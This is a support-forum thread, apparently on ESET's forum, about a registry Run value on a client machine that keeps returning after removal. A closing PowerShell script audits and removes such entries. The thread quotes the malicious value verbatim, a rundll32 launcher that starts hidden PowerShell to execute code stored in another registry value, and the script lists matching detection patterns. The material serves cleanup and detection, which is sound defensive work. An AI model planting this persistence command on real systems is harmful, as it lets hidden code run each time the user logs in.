Carl S, March 4, 2020:
This keeps showing up on one of our client machines, in the registry, with the Registry scanner, detection engine 20939 (20200303):
Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8
\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
ESMC says that it was "cleaned by deleting," but then it shows up again a few hours later. Is there some way to identify the process that is reinserting this? Or what else should I do next?
itman, March 4, 2020:
Quoting Carl S (14 minutes ago): \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
Did you manually check what's in that registry key? Display a screenshot of what's in the key.
Carl S, March 4, 2020:
Quoting itman (10 minutes ago): Did you manually check what's in that registry key? Display a screenshot of what's in the key.
When I search for that key I don't find it in regedit.
itman, March 5, 2020:
Search for: HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
Marcos (Administrator), March 5, 2020:
Please provide ESET Log Collector logs from the machine.
Carl S, March 5, 2020:
Quoting itman (16 hours ago): Search for: HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run
Duh, didn't catch that, I just cut and pasted. Thanks.
Carl S, March 5, 2020:
OK, found it by navigating to it. Could not get search to work. In the meantime, I have ESET client issues on that machine, probably due to my own fault.
itman, March 5, 2020:
Quoting Carl S (50 minutes ago): OK, found it by navigating to it. Could not get search to work.
So was there anything present in that registry key?
Carl S, March 5, 2020:
The suspicious part seems to be:
key: authHost
value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))
Carl S, March 5, 2020:
Quoting Marcos (12 hours ago): Please provide ESET Log Collector logs from the machine.
Working on this. I killed off the ESET agent accidentally while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent. Now up and running again, and will get the logs. (OK, it's collecting right now.) It's been years since I've submitted these types of logs, so remind me: do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.
Carl S, March 5, 2020:
Quoting Marcos (13 hours ago): Please provide ESET Log Collector logs from the machine.
Hmm. I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."
itman, March 5, 2020 (edited):
Quoting Carl S (1 hour ago): The suspicious part seems to be: key: authHost value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))
I would say it is malicious. To be on the safe side, export the reg. key to a safe location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it. Note that authhost.exe is a legit Win system process, but that is obviously not what is running here.
Carl S, March 5, 2020:
Quoting itman (21 minutes ago): I would say it is malicious. To be on the safe side, export the reg. key to a safe location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it. Note that authhost.exe is a legit Win system process, but that is obviously not what is running here.
Am I deleting the whole key / value pair, or the value and leaving the key?
Carl S, March 5, 2020:
Quoting Marcos (14 hours ago): Please provide ESET Log Collector logs from the machine.
Marcos, I re-ran the collector on a whim, and this time it worked. I now have the zip file ready.
itman, March 5, 2020 (edited):
Quoting Carl S (44 minutes ago): Am I deleting the whole key / value pair, or the value and leaving the key?
I believe what is shown in your reg. key is this: BTW, when I tried to enter the rundll.exe code as data, Eset immediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screenshot. Anyway, you will be deleting "authHost", which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it, which is the malicious code.
itman, March 5, 2020:
I suspect what the malware did was a registry Import or equivalent to get around Eset's detection of the malicious code.
itman, March 6, 2020 (edited):
Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E. This is what the PowerShell script was using. Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go, along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.
Marcos (Administrator), March 6, 2020:
Quoting Carl S (10 hours ago): Marcos, I re-ran the collector on a whim, and this time it worked. I now have the zip file ready.
You can upload it here; only ESET staff and the poster have access to attachments. Alternatively, you can upload the archive to a safe location and drop me a personal message with a download link.
Carl S, March 6, 2020:
Quoting itman (14 hours ago): Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E. This is what the PowerShell script was using. Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go, along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.
I was thinking that myself; even though I'm not all that familiar with the registry, it was clear the PowerShell string was pointing to that other registry item.
Carl S, March 6, 2020:
Hi Marcos, here is the attachment. I removed the value of the authHost line. But other than that, everything else is the same. FWIW, I have had no new detections since the 4th.
Attachment: 10485-baker01-ees_logs.zip
itman, March 6, 2020:
Quoting Carl S (just now): I was thinking that myself; even though I'm not all that familiar with the registry, it was clear the PowerShell string was pointing to that other registry item.
Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.
Carl S, March 6, 2020:
Quoting itman (12 minutes ago): Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.
Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected, and it is still not in the registry since manually removing it yesterday.
Marcos (Administrator), March 6, 2020:
Please delete the following registry values and then reboot the machine:
HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHost
HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr
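The steps this thread converged on (find the Run value, follow the Get-ItemProperty reference to the staging value, export the keys, delete both values, reboot) can be scripted so the check is repeatable after the reboot. The script below is an added example written for this thread; it is not ESET's tooling and not something any poster supplied. It assumes it runs in the affected user's session (so HKCU: is that user's hive); $BackupDir, the -Remove switch and the two function names are my own choices. The indicator patterns are taken from the value Carl S posted plus the generic "launch PowerShell and iex something" shape, so a match is a reason to look, not proof of malware.

```powershell
# Added example (not from the thread or from ESET): audit HKCU Run values for the
# rundll32 ShellExec_RunDLL -> cmd -> powershell iex(Get-ItemProperty <key>).<value>
# shape seen above, export affected keys with reg.exe first, and remove the flagged
# value(s) only when -Remove is passed. $BackupDir is an example path.
param(
    [switch]$Remove,
    [string]$BackupDir = 'C:\RegBackup'
)

$RunKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Indicators drawn from the posted value; a hit means "inspect", not "malicious".
$Patterns = @(
    'ShellExec_RunDLL',
    'powershell[^"]*\biex\b',
    'Invoke-Expression',
    'Get-ItemProperty\s+''HKCU:\\Software\\AppDataLow',
    '\s-e(nc|ncodedcommand)?\s'
)

function Get-SuspiciousRunValues {
    param([string]$Path = $RunKey)
    $item = Get-Item -Path $Path -ErrorAction Stop
    foreach ($name in $item.GetValueNames()) {
        # Read the stored text as-is; do not expand %VARS% before matching.
        $data = [string]$item.GetValue($name, '', 'DoNotExpandEnvironmentNames')
        $hits = @($Patterns | Where-Object { $data -match $_ })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Key = $Path; Name = $name; Data = $data; Matched = ($hits -join '; ') }
        }
    }
}

function Backup-RegistryKey {
    param([string]$Path, [string]$Dir = $BackupDir)
    New-Item -ItemType Directory -Path $Dir -Force | Out-Null
    # reg.exe wants HKCU\..., not the PowerShell drive form HKCU:\...
    $native = $Path -replace '^HKCU:\\', 'HKCU\' -replace '^HKLM:\\', 'HKLM\'
    $file = Join-Path $Dir ('{0}_{1:yyyyMMdd_HHmmss}.reg' -f ($native -replace '[\\:]', '_'), (Get-Date))
    & reg.exe export $native $file /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg.exe export failed for $native" }
    return $file
}

$findings = @(Get-SuspiciousRunValues)
if ($findings.Count -eq 0) { Write-Host "No suspicious values under $RunKey"; return }
$findings | Format-List | Out-Host

foreach ($f in $findings) {
    # The posted value pulled its real code from a second registry value,
    # (Get-ItemProperty '<key>').<name>; locate it so it is backed up and
    # removed together with the Run entry, as Marcos advised.
    $stage = $null
    if ($f.Data -match "Get-ItemProperty\s+'([^']+)'\)\.(\w+)") {
        $stage = @{ Path = $Matches[1]; Name = $Matches[2] }
        Write-Host "Value '$($f.Name)' loads its code from $($stage.Path) value '$($stage.Name)'"
    }

    Write-Host ('Exported {0} to {1}' -f $f.Key, (Backup-RegistryKey -Path $f.Key))
    if ($stage -and (Test-Path $stage.Path)) {
        Write-Host ('Exported {0} to {1}' -f $stage.Path, (Backup-RegistryKey -Path $stage.Path))
    }

    if (-not $Remove) { Write-Host 'Re-run with -Remove to delete the value(s) above.'; continue }
    Remove-ItemProperty -Path $f.Key -Name $f.Name
    if ($stage -and (Test-Path $stage.Path)) {
        Remove-ItemProperty -Path $stage.Path -Name $stage.Name -ErrorAction SilentlyContinue
    }
    Write-Host "Removed $($f.Name); reboot and run this again to confirm nothing re-creates it."
}
```

Run it once without -Remove to see the report and the exported .reg files, then with -Remove; running it a third time after the reboot answers the question Carl S raised about whether something keeps putting the value back. The exports are what lets you import the key again if removal turns out to break something, which is the precaution itman asked for.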